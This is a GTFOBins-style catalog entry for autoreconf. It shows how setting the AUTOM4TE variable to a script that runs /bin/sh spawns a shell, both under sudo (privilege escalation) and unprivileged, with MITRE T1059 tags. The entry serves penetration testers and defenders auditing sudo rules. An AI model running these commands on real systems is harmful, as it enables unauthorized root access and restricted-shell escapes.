Catalog GTFOBins

GTFO · Tool

autoreconf

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

The shell is invoked multiple times.

echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
echo AC_INIT >configure.ac
AUTOM4TE=/path/to/temp-file autoreconf
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux

The shell is invoked multiple times.

echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
echo AC_INIT >configure.ac
AUTOM4TE=/path/to/temp-file autoreconf
Context
unprivileged
Native
shell
MITRE
T1059